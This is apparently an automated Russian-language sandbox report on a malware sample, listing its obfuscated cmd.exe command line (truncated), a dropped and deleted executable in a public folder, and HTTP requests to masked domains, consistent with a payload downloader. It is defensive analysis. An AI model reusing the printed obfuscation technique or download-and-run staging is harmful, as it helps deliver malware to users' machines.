Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' lnNTSvoFmURQzq pmzTKQSniDjszmznOVC iEJUkUCfvjQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %bALlbJbSNOfmHVB%=iUYJJrRI&&set %NYFdvGldzq%=p&&set %zDiNvbRjd%=o^w&...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\22760.exe
Удаляет следующие файлы
- C:\users\public\22760.exe
Сетевая активность
Подключается к
- 'hb##nte.com':80
- 'to######-technology.co.uk':80
- 'ar###igroup.com':80
- 'ca##n.us':80
- 'ba##no.com':80
- 'hu###omains.com':443
TCP
Запросы HTTP GET
- http://hb##nte.com/HwFiV4/
- http://to######-technology.co.uk/BYvXGh/
- http://ar###igroup.com/0GHagS/
- http://ca##n.us/SYxX/
- http://ca##n.us/cgi-sys/suspendedpage.cgi
- http://ba##no.com/uBQZxCQ/
Другие
- 'hu###omains.com':443
UDP
- DNS ASK hb##nte.com
- DNS ASK to######-technology.co.uk
- DNS ASK ar###igroup.com
- DNS ASK ca##n.us
- DNS ASK ba##no.com
- DNS ASK hu###omains.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' lnNTSvoFmURQzq pmzTKQSniDjszmznOVC iEJUkUCfvjQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %bALlbJbSNOfmHVB%=iUYJJrRI&&set %NYFdvGldzq%=p&&set %zDiNvbRjd%=o^w&...' (со скрытым окном)
